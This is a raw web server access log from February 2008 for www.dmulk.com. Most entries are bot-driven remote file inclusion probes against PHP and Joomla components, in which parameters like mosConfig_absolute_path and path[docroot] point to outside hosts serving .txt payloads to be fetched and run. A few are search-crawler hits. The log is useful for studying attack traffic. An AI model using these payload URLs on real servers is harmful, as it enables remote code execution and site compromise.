72.29.89.97 - - [12/Feb/2008:14:08:00 -0800] "GET /index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.49 - - [12/Feb/2008:14:08:06 -0800] "GET /logs/access_070806.log HTTP/1.0" 200 23344 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.225 - - [12/Feb/2008:14:08:19 -0800] "GET /megumi/Bracelet/?M=A HTTP/1.0" 200 1689 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.194.79.1 - - [12/Feb/2008:14:08:34 -0800] "GET /logs/access_080130.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.specialistec.com/doceboCms/a? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.171.102.74 - - [12/Feb/2008:14:09:48 -0800] "GET /logs/access_080122.log//newspublish/include.php?path%5Bdocroot%5D=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.171.102.74 - - [12/Feb/2008:14:09:49 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.171.102.74 - - [12/Feb/2008:14:09:49 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.88.23.149 - - [12/Feb/2008:14:10:29 -0800] "GET /logs/access_071225.log//oneadmin/config.php?path[docroot]=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.88.23.149 - - [12/Feb/2008:14:10:29 -0800] "GET //oneadmin/config.php?path[docroot]=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.88.23.149 - - [12/Feb/2008:14:10:30 -0800] "GET /logs//oneadmin/config.php?path[docroot]=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.88.23.149 - - [12/Feb/2008:14:10:31 -0800] "GET /logs/access_071225.log//oneadmin/config.php?path[docroot]=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.88.23.149 - - [12/Feb/2008:14:10:32 -0800] "GET //oneadmin/config.php?path[docroot]=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.88.23.149 - - [12/Feb/2008:14:10:32 -0800] "GET /logs//oneadmin/config.php?path[docroot]=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.11.181 - - [12/Feb/2008:14:11:02 -0800] "GET /index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.215.226.24 - - [12/Feb/2008:14:12:31 -0800] "GET /logs/access_080120.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://avvv.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.67.82 - - [12/Feb/2008:14:13:12 -0800] "GET /logs/access_071219.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.19.225.162 - - [12/Feb/2008:14:15:33 -0800] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.bpec-english.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
193.19.225.162 - - [12/Feb/2008:14:15:37 -0800] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.bpec-english.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
209.90.120.18 - - [12/Feb/2008:14:17:29 -0800] "GET /logs/access_080122.log//include.php?path[docroot]=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.90.120.18 - - [12/Feb/2008:14:17:29 -0800] "GET //include.php?path[docroot]=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.90.120.18 - - [12/Feb/2008:14:17:29 -0800] "GET /logs//include.php?path[docroot]=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.90.120.18 - - [12/Feb/2008:14:17:35 -0800] "GET /logs/access_080122.log//include.php?path[docroot]=http://www.j-vision.co.kr/rhe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.90.120.18 - - [12/Feb/2008:14:17:35 -0800] "GET //include.php?path[docroot]=http://www.j-vision.co.kr/rhe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.90.120.18 - - [12/Feb/2008:14:17:35 -0800] "GET /logs//include.php?path[docroot]=http://www.j-vision.co.kr/rhe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.111.169.172 - - [12/Feb/2008:14:18:49 -0800] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.111.169.172 - - [12/Feb/2008:14:18:49 -0800] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.111.169.172 - - [12/Feb/2008:14:18:50 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
122.203.38.130 - - [12/Feb/2008:14:19:22 -0800] "GET /logs/access_071219.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.burhanukum.com/images/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.121.101.115 - - [12/Feb/2008:14:19:33 -0800] "GET /logs/access_080201.log/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sbn.poilpark.net/docu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.101.115 - - [12/Feb/2008:14:19:34 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sbn.poilpark.net/docu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.101.115 - - [12/Feb/2008:14:19:34 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sbn.poilpark.net/docu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.111.169.172 - - [12/Feb/2008:14:19:40 -0800] "GET /logs/access_071219.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.171.102.74 - - [12/Feb/2008:14:20:11 -0800] "GET /logs/access_080122.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.171.102.74 - - [12/Feb/2008:14:20:12 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.171.102.74 - - [12/Feb/2008:14:20:12 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.168.186 - - [12/Feb/2008:14:20:58 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://branigan.net/mmb/test.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
212.241.183.41 - - [12/Feb/2008:14:21:01 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
200.69.205.114 - - [12/Feb/2008:14:21:04 -0800] "GET /logs/access_080122.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.69.205.114 - - [12/Feb/2008:14:21:04 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.69.205.114 - - [12/Feb/2008:14:21:04 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.241.169.59 - - [12/Feb/2008:14:21:30 -0800] "GET /logs/access_080111.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.44.248.81 - - [12/Feb/2008:14:21:54 -0800] "GET /logs/access_071219.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.121.101.115 - - [12/Feb/2008:14:22:04 -0800] "GET /logs/access_080117.log/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://sbn.poilpark.net/docu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.168.186 - - [12/Feb/2008:14:24:02 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://branigan.net/mmb/test.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
212.241.183.41 - - [12/Feb/2008:14:24:03 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
213.203.223.93 - - [12/Feb/2008:14:24:43 -0800] "GET /logs/access_080121.log/modules/My_eGallery/index.php?basepath=http://www.sternkinder2005.de/video/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
213.203.223.93 - - [12/Feb/2008:14:24:43 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.sternkinder2005.de/video/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
213.203.223.93 - - [12/Feb/2008:14:24:43 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.sternkinder2005.de/video/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:14:26:23 -0800] "GET /logs/access_080131.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:14:26:24 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:14:26:28 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:14:26:55 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.2.252.56 - - [12/Feb/2008:14:28:04 -0800] "GET /logs/access_080201.log/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.2.252.56 - - [12/Feb/2008:14:28:04 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.2.252.56 - - [12/Feb/2008:14:28:04 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.62.67.82 - - [12/Feb/2008:14:28:08 -0800] "GET /logs/access_080108.log//?index.php?mosConfig_absolute_path=add%20this? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [12/Feb/2008:14:28:10 -0800] "GET //?index.php?mosConfig_absolute_path=add%20this? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [12/Feb/2008:14:28:11 -0800] "GET /logs//?index.php?mosConfig_absolute_path=add%20this? HTTP/1.1" 200 34970 "-" "libwww-perl/5.808" "www.dmulk.com"
82.146.33.210 - - [12/Feb/2008:14:28:37 -0800] "GET /index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
82.146.33.210 - - [12/Feb/2008:14:28:37 -0800] "GET /logs/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
61.100.189.222 - - [12/Feb/2008:14:29:56 -0800] "GET /logs/access_080118.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.burhanukum.com/images/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.220.195.20 - - [12/Feb/2008:14:30:04 -0800] "GET /logs/access_080118.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.burhanukum.com/images/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.89.97 - - [12/Feb/2008:14:30:04 -0800] "GET /logs/access_080131.log/index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.89.97 - - [12/Feb/2008:14:30:05 -0800] "GET /logs/index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.220.195.20 - - [12/Feb/2008:14:30:38 -0800] "GET /logs/access_080118.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.burhanukum.com/images/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.2.252.56 - - [12/Feb/2008:14:31:17 -0800] "GET /logs/access_080117.log/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.230.11.181 - - [12/Feb/2008:14:32:06 -0800] "GET /logs/access_080131.log/index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.11.181 - - [12/Feb/2008:14:32:07 -0800] "GET /logs/index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.203.223.93 - - [12/Feb/2008:14:33:07 -0800] "GET /logs/access_080131.log/modules/My_eGallery/index.php?basepath=http://www.sternkinder2005.de/video/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
72.5.54.42 - - [12/Feb/2008:14:33:44 -0800] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.42 - - [12/Feb/2008:14:33:44 -0800] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.42 - - [12/Feb/2008:14:33:44 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.157.122.154 - - [12/Feb/2008:14:34:23 -0800] "GET /logs/access_071225.log//index.php?option=com_content&do_pdf=1&id=14//?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.157.122.154 - - [12/Feb/2008:14:34:32 -0800] "GET //index.php?option=com_content&do_pdf=1&id=14//?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.36.30.145 - - [12/Feb/2008:14:34:58 -0800] "GET /logs/access_080118.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.burhanukum.com/images/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.36.30.145 - - [12/Feb/2008:14:36:20 -0800] "GET /logs/access_080118.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.burhanukum.com/images/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.185.237.125 - - [12/Feb/2008:14:38:28 -0800] "GET /logs/access_080122.log//include.php?path[docroot]=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.125 - - [12/Feb/2008:14:38:28 -0800] "GET //include.php?path[docroot]=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.125 - - [12/Feb/2008:14:38:29 -0800] "GET /logs//include.php?path[docroot]=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.30.214.232 - - [12/Feb/2008:14:40:14 -0800] "GET /logs/access_071230.log HTTP/1.0" 200 231687 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.111.169.172 - - [12/Feb/2008:14:40:30 -0800] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.111.169.172 - - [12/Feb/2008:14:40:30 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.111.169.172 - - [12/Feb/2008:14:40:30 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.186.169.183 - - [12/Feb/2008:14:41:14 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.88.23.149 - - [12/Feb/2008:14:41:15 -0800] "GET /logs/access_080131.log//oneadmin/config.php?path[docroot]=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.88.23.149 - - [12/Feb/2008:14:41:15 -0800] "GET /logs/access_080131.log//oneadmin/config.php?path[docroot]=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.88.23.149 - - [12/Feb/2008:14:41:16 -0800] "GET //oneadmin/config.php?path[docroot]=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.88.23.149 - - [12/Feb/2008:14:41:16 -0800] "GET //oneadmin/config.php?path[docroot]=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.88.23.149 - - [12/Feb/2008:14:41:16 -0800] "GET /logs//oneadmin/config.php?path[docroot]=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.88.23.149 - - [12/Feb/2008:14:41:16 -0800] "GET /logs//oneadmin/config.php?path[docroot]=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.157.106 - - [12/Feb/2008:14:45:16 -0800] "GET /logs/access_080122.log//include.php?path[docroot]=http://www.j-vision.co.kr/rhe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.48.157.106 - - [12/Feb/2008:14:45:17 -0800] "GET //include.php?path[docroot]=http://www.j-vision.co.kr/rhe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.48.157.106 - - [12/Feb/2008:14:45:18 -0800] "GET /logs//include.php?path[docroot]=http://www.j-vision.co.kr/rhe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.203.38.130 - - [12/Feb/2008:14:45:19 -0800] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.burhanukum.com/images/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
122.203.38.130 - - [12/Feb/2008:14:45:19 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.burhanukum.com/images/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
122.203.38.130 - - [12/Feb/2008:14:45:20 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.burhanukum.com/images/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.199.215.57 - - [12/Feb/2008:14:47:13 -0800] "GET /logs/access_080131.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.199.215.57 - - [12/Feb/2008:14:47:13 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.97.207.101 - - [12/Feb/2008:14:47:21 -0800] "GET //classes/adodbt/sql.php?classes_dir=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.186.169.183 - - [12/Feb/2008:14:48:00 -0800] "GET /logs/access_080117.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [12/Feb/2008:14:48:00 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.42 - - [12/Feb/2008:14:48:16 -0800] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.42 - - [12/Feb/2008:14:48:16 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.5.54.42 - - [12/Feb/2008:14:48:16 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.66.124.141 - - [12/Feb/2008:14:49:25 -0800] "GET /logs/access_080201.log/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [12/Feb/2008:14:49:25 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [12/Feb/2008:14:49:26 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
208.186.169.183 - - [12/Feb/2008:14:50:52 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.182.65.154 - - [12/Feb/2008:14:51:10 -0800] "GET /logs/access_071225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.25.34 - - [12/Feb/2008:14:52:42 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://avvv.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.25.34 - - [12/Feb/2008:14:52:42 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://avvv.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.25.34 - - [12/Feb/2008:14:52:42 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://avvv.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.25.34 - - [12/Feb/2008:14:52:51 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://avvv.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.235.52.184 - - [12/Feb/2008:14:53:48 -0800] "GET /logs/access_080108.log/write.php?dir=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.235.52.184 - - [12/Feb/2008:14:53:48 -0800] "GET /write.php?dir=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
